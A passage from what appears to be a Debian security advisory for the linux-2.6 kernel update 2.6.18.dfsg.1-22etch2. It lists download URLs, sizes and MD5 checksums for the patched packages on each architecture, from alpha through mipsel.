http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-22etch2.dsc\r\n Size/MD5 checksum: 5672 780d93329a4cedaad9d0539c1cc400ac\r\n \r\nhttp://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.22etch2.diff.gz\r\n Size/MD5 checksum: 18180 2b9bbd3f4bcc3852320fc60d6947607e\r\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.22etch2.tar.gz\r\n Size/MD5 checksum: 56550 01fd54902e7ac7c3035c5176f1deae3c\r\n\r\nArchitecture independent packages:\r\n\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.18-6_2.6.18.dfsg.1-22etch2_all.deb\r\n Size/MD5 checksum: 3718952 804c3adc75403db743f603fd1dc44fa2\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.18_2.6.18.dfsg.1-22etch2_all.deb\r\n Size/MD5 checksum: 41460250 9fda57df0d76f6300b162c0765a87e32\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.18_2.6.18.dfsg.1-22etch2_all.deb\r\n Size/MD5 checksum: 1632622 6d644a3a0502065b7a9faa9a7efdb8f4\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.18_2.6.18.dfsg.1-22etch2_all.deb\r\n Size/MD5 checksum: 1087372 8ff719e7a81edaa38b5eca31a7aaee02\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.18_2.6.18.dfsg.1-22etch2_all.deb\r\n Size/MD5 checksum: 3590476 b803de0252e4f027567c5c13db4afe0a\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.18_2.6.18.dfsg.1-22etch2_all.deb\r\n Size/MD5 checksum: 55722 a4dd6ba664f85780bbe1ebf7f3a77b25\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-22etch2_alpha.deb\r\n Size/MD5 checksum: 23464338 df80e9f9afac5942ec8cd73c8fa2acd3\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-22etch2_alpha.deb\r\n Size/MD5 checksum: 55150 c752933d6628e0ebe75dbe47f29ad4e2\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-generic_2.6.18.dfsg.1-22etch2_alpha.deb\r\n Size/MD5 checksum: 268952 128bea32232629d3255799ddc83da7b3\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-22etch2_alpha.deb\r\n Size/MD5 checksum: 269648 7617546d15e940343cbe381dfecae010\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-22etch2_alpha.deb\r\n Size/MD5 checksum: 3053804 f72f8a710f0a4da22bc8fd431d9195ee\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-smp_2.6.18.dfsg.1-22etch2_alpha.deb\r\n Size/MD5 checksum: 268368 5c248dbb5e31cc30d4148196b1f5cef0\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-alpha_2.6.18.dfsg.1-22etch2_alpha.deb\r\n Size/MD5 checksum: 55180 2a8a3e402015cf1908906180eb6f8a5f\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-smp_2.6.18.dfsg.1-22etch2_alpha.deb\r\n Size/MD5 checksum: 23846050 ba3b97267e75c3d8027627b2a3ece5fb\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-generic_2.6.18.dfsg.1-22etch2_alpha.deb\r\n Size/MD5 checksum: 23485982 9ea2f705c0a99080425de75c48c66904\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-22etch2_alpha.deb\r\n Size/MD5 checksum: 269242 1edcca9164f4eecd392897903269c1e2\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-22etch2_alpha.deb\r\n Size/MD5 checksum: 3028978 253a048a7d3ccdf823b8e28b47e5f849\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.22etch2_amd64.deb\r\n Size/MD5 checksum: 5961854 67e6d9bddf32e6ff37f15a37f9aa2b04\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\r\n Size/MD5 checksum: 55174 94bc1ab70d46a153205059b1ba2fbd9e\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\r\n Size/MD5 checksum: 279498 bf0107981fe6a603a9b72be5e94190bb\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\r\n Size/MD5 checksum: 16909690 0d7e343ec621b05fb565ed0c4b355c9e\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-22etch2_amd64.deb\r\n Size/MD5 checksum: 3252530 97dc43477d90cae8fd6b4033781ce589\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\r\n Size/MD5 checksum: 277930 b719a1156f14a870b6f0fed9fcac0e26\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\r\n Size/MD5 checksum: 55146 865ab31e1451d19f5374492c7b5cec02\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-22etch2_amd64.deb\r\n Size/MD5 checksum: 55152 811c0ed6f63166536426b3a30a0ae6a0\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\r\n Size/MD5 checksum: 1652318 1e02b1e5c1315c6775efd5a3ebb8eba0\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-22etch2_amd64.deb\r\n Size/MD5 checksum: 3228660 b3491a01820796609c57ff0ca45cd991\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\r\n Size/MD5 checksum: 1684052 214c87ec095a47ddb16cb5a0386385d0\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\r\n Size/MD5 checksum: 15370528 6429150ddfdc20c94f5dd9223ce1eefa\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\r\n Size/MD5 checksum: 16955552 08dbcfaeb394f720be04b43584cc2dca\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\r\n Size/MD5 checksum: 277636 0c1dd9ed04830cef72a2799682cdb373\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-22etch2_amd64.deb\r\n Size/MD5 checksum: 3422414 a66a5347a66c224513912f23df6e7811\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-22etch2_amd64.deb\r\n Size/MD5 checksum: 3397342 d69524c251013eca5cb9c2fc6ac49f08\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\r\n Size/MD5 checksum: 278800 f808d9f0b51671184647976e61673ef7\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\r\n Size/MD5 checksum: 55126 dcc26a10c820fe676abf6d0a8f733190\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\r\n Size/MD5 checksum: 15356684 ca635c5a74fde0c121ac8ad0dca7f3bc\r\n\r\narm architecture (ARM)\r\n\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-ixp4xx_2.6.18.dfsg.1-22etch2_arm.deb\r\n Size/MD5 checksum: 240724 05944f6adaed3622fdbf4fa94d9e37c1\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-22etch2_arm.deb\r\n Size/MD5 checksum: 55194 cfb4019acf8ce2b9eca9a06cde8fa6d8\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-rpc_2.6.18.dfsg.1-22etch2_arm.deb\r\n Size/MD5 checksum: 200112 db009d7e4d83679ea6bf62352e8cbe27\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-iop32x_2.6.18.dfsg.1-22etch2_arm.deb\r\n Size/MD5 checksum: 7925520 1488da3529714a8490790357b2a28d34\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-iop32x_2.6.18.dfsg.1-22etch2_arm.deb\r\n Size/MD5 checksum: 235346 8bac39d6ded885fc5247046c1a0f5c1c\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s3c2410_2.6.18.dfsg.1-22etch2_arm.deb\r\n Size/MD5 checksum: 205074 8fa04e311cd6e56aa2749d4146056c77\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-arm_2.6.18.dfsg.1-22etch2_arm.deb\r\n Size/MD5 checksum: 55234 060e1f4e0b26b2fb42fe0be4d8078952\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-22etch2_arm.deb\r\n Size/MD5 checksum: 3411494 cfe4f5b7273940720e2bc1e945631f1c\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-rpc_2.6.18.dfsg.1-22etch2_arm.deb\r\n Size/MD5 checksum: 4588214 42d8698407235b46507cf2d7b992c09c\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-footbridge_2.6.18.dfsg.1-22etch2_arm.deb\r\n Size/MD5 checksum: 234198 35c06e74a9f26ab8217ea98df7c01a9b\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-footbridge_2.6.18.dfsg.1-22etch2_arm.deb\r\n Size/MD5 checksum: 7567632 3e4a444afcf3df3e510e2c5000a4b684\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s3c2410_2.6.18.dfsg.1-22etch2_arm.deb\r\n Size/MD5 checksum: 5010844 a3a1c62fbe80192e80bcaac498036e92\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-ixp4xx_2.6.18.dfsg.1-22etch2_arm.deb\r\n Size/MD5 checksum: 8872222 e1a64be9bdc5246dd1d9ef666eb0a311\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-22etch2_hppa.deb\r\n Size/MD5 checksum: 11805014 e45047cea390fd98d4a55557414b578e\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-hppa_2.6.18.dfsg.1-22etch2_hppa.deb\r\n Size/MD5 checksum: 55184 397ca7761578ce779b6ef9bacc372ffb\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc_2.6.18.dfsg.1-22etch2_hppa.deb\r\n Size/MD5 checksum: 10551992 1d693cdd06bb4dee92a25cd886817522\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-22etch2_hppa.deb\r\n Size/MD5 checksum: 55158 15e7aa685aea41e29ac6c76825e99ad6\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-22etch2_hppa.deb\r\n Size/MD5 checksum: 199066 5aaf2ce6a96449673f8a8f48f36cf841\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64_2.6.18.dfsg.1-22etch2_hppa.deb\r\n Size/MD5 checksum: 11400554 53c5eca027dc1015bf6423cbe65536cd\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc-smp_2.6.18.dfsg.1-22etch2_hppa.deb\r\n Size/MD5 checksum: 10998698 050980b34cbc925f0842c161828aa1f7\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64_2.6.18.dfsg.1-22etch2_hppa.deb\r\n Size/MD5 checksum: 197944 1d45f1fe804821cc7b8aa80b0dec4f36\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-22etch2_hppa.deb\r\n Size/MD5 checksum: 3022526 52b6702172ceb2064dde03ea3cacca7a\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc-smp_2.6.18.dfsg.1-22etch2_hppa.deb\r\n Size/MD5 checksum: 198152 556e2b16e2988976dac562f1baad15a9\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc_2.6.18.dfsg.1-22etch2_hppa.deb\r\n Size/MD5 checksum: 197130 298d3e069a1f6996685c4a5a8bc1bada\r\n\r\ni386 architecture (Intel ia32)\r\n\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-686_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 16377614 74d1938921db193d10a0ff798fe7c005\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-686_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 272450 5468ca009d328fc890a6ab771ab20968\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-k7_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 16471330 35ea40d0f873d6c8ff819a62239623ac\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-k7_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 280452 b055d4305ed580aa9603c3ff5b8c48ef\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 16838150 45beacafd1a4902c055c41bd7711586a\r\n \r\nhttp://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.22etch2_i386.deb\r\n Size/MD5 checksum: 25589346 bf03c496e08b7d40f52f602011c07560\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686-bigmem_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 16406940 0225f98fb843e23225875943b5179aa1\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-686_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 55132 28a33a24ebdcdcad85d335499397c88c\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-i386_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 55196 16b6e16eefaeb5891ab4ba7f832d0ed3\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 3169128 eb405a8b5c8b6d815c95f73262a99af1\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 55144 3d96d807e874865af58831720adb4486\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 3055432 a496fea546da3a21748b444ffd6836ec\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 272846 c58bde7235a1f1ac5c8145dc1ae9346b\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 55140 eee1bdfac4bbecc919d0151b2e23d24c\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 14292444 19fe5544166f396830fef3a1b4e4626f\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 280608 496144bbb1d620644189d012b9d6ea70\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-486_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 282902 f4145bd74ab9467b1af36da46b7666ef\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-k7_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 279034 26430131dc00922da7c9b034c191eaf1\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 272230 871474e9b227166f527391aa064ec971\r\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.22etch2_i386.deb\r\n Size/MD5 checksum: 5505296 9da61c3c82edf996a6324ebd4517251c\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 3149672 c6cbb32f47b75db7d63a6fcf84e0df38\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 3171866 333ceba6af38b86e41a1db10fc764319\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686-bigmem_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 281062 c0c403aedd560ad15fb7d90c54ce3145\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-486_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 16192240 a4a3d514e989d64042c46d3ad8d0b0ae\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-686_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 278950 9de592d811e51eeb07ebe193f8734d15\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 16337664 a367c6561e7cf8ff701a731d8072dca2\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 1328006 c5089d6b0fa44ce46fdbbd17140cb9c6\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-k7_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 16509906 c8894d32a5f39e7512d2db9de74ddf3c\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-686_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 1300920 9c42c8356ab3a07b89f2d95f47de5303\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-686_2.6.18.dfsg.1-22etch2_i386.deb\r\n Size/MD5 checksum: 14281014 32f281f475d4ee1f2d67dd029231ea46\r\n\r\nia64 architecture (Intel ia64)\r\n\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-mckinley_2.6.18.dfsg.1-22etch2_ia64.deb\r\n Size/MD5 checksum: 256640 e96b0df79e67e6049d8feeb73e63f287\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-ia64_2.6.18.dfsg.1-22etch2_ia64.deb\r\n Size/MD5 checksum: 55174 c93847739b57f47faacaf642de4ab6c1\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-itanium_2.6.18.dfsg.1-22etch2_ia64.deb\r\n Size/MD5 checksum: 256732 af4ee0bbafe50ce27d875243fe626ab9\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-mckinley_2.6.18.dfsg.1-22etch2_ia64.deb\r\n Size/MD5 checksum: 28181368 dff959a14317741919a7a46d73c273a8\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-22etch2_ia64.deb\r\n Size/MD5 checksum: 55146 9f30373190856528f752d21d66a88053\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-itanium_2.6.18.dfsg.1-22etch2_ia64.deb\r\n Size/MD5 checksum: 28014200 d290bc90985342dfe3b348d3e1d07922\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-22etch2_ia64.deb\r\n Size/MD5 checksum: 3083012 cbb353d4e8cb3a2bfc4dbf43f4427344\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r4k-ip22_2.6.18.dfsg.1-22etch2_mips.deb\r\n Size/MD5 checksum: 8311782 6b24a125c1b553bd4f69d830f2d19eaa\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-qemu_2.6.18.dfsg.1-22etch2_mips.deb\r\n Size/MD5 checksum: 6124616 ab5d97cb43f8e7d0f7cfebe2db2416df\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-22etch2_mips.deb\r\n Size/MD5 checksum: 55190 1cd7be3bb06e63ecf67e6c5c175aa201\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-22etch2_mips.deb\r\n Size/MD5 checksum: 187898 a74c79e4b6de9312c1a531b7d1c04e06\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r4k-ip22_2.6.18.dfsg.1-22etch2_mips.deb\r\n Size/MD5 checksum: 164036 58db324ddfe7d1b3f7086c67091c1ae3\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-22etch2_mips.deb\r\n Size/MD5 checksum: 15654946 4c99171f6b6e8e0b06d88f65244f5a5c\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-qemu_2.6.18.dfsg.1-22etch2_mips.deb\r\n Size/MD5 checksum: 155578 71edf3d7d29b414ee8fe9c26d98afe2f\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-22etch2_mips.deb\r\n Size/MD5 checksum: 15680482 79ca37454bab6d11c4af5621e3963e87\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r5k-ip32_2.6.18.dfsg.1-22etch2_mips.deb\r\n Size/MD5 checksum: 168240 0eafb18463f917510d3110c74786742d\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-22etch2_mips.deb\r\n Size/MD5 checksum: 3415314 94c72a62a2c3c52535c3ef4936400ad9\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r5k-ip32_2.6.18.dfsg.1-22etch2_mips.deb\r\n Size/MD5 checksum: 9077040 581d6744c0c10ec63b06b5d058e44a87\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-mips_2.6.18.dfsg.1-22etch2_mips.deb\r\n Size/MD5 checksum: 55236 7c94ce0a6b000ba9abcc0bf8272e033c\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-22etch2_mips.deb\r\n Size/MD5 checksum: 188208 2356f7b9cf66b0694b1b7bb07e9e1df0\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-22etch2_mipsel.deb\r\n Size/MD5 checksum: 3351164 f15965863479e2b0eab136c912b25ebd\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-22etch2_mipsel.deb\r\n Size/MD5 checksum: 183690 e20c71f57188bc8458abb4dc212402f3\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r4k-kn04_2.6.18.dfsg.1-22etch2_mipsel.deb\r\n Size/MD5 checksum: 156886 65c9aec3009d7ace0550bee15d0bd34c\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-qemu_2.6.18.dfsg.1-22etch2_mipsel.deb\r\n Size/MD5 checksum: 151270 92419bb4255d3989eef1b3d2e616e5a5\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r5k-cobalt_2.6.18.dfsg.1-22etch2_mipsel.deb\r\n Size/MD5 checksum: 9864388 2aa86c68a6c8ac36e8dc22aafcac34fb\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-22etch2_mipsel.deb\r\n Size/MD5 checksum: 183862 262a4f1a05c00b6c2752733101d2bb4b\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-qemu_2.6.18.dfsg.1-22etch2_mipsel.deb\r\n Size/MD5 checksum: 6030536 1199eb8f7b6a9b4ff1a32ebccfcd7074\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r3k-kn02_2.6.18.dfsg.1-22etch2_mipsel.deb\r\n Size/MD5 checksum: 5944692 205d02fd233142d8058874e6ead00e94\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r3k-kn02_2.6.18.dfsg.1-22etch2_mipsel.deb\r\n Size/MD5 checksum: 156854 1f02416baf0082238418bba97eb8aa4f\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-22etch2_mipsel.deb\r\n Size/MD5 checksum: 15028044 00f2ad06dfa6c908036349c35a5a8e39\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-22etch2_mipsel.deb\r\n Size/MD5 checksum: 55154 6b6f4c17287d5e053d716a742cb738a0\r\n 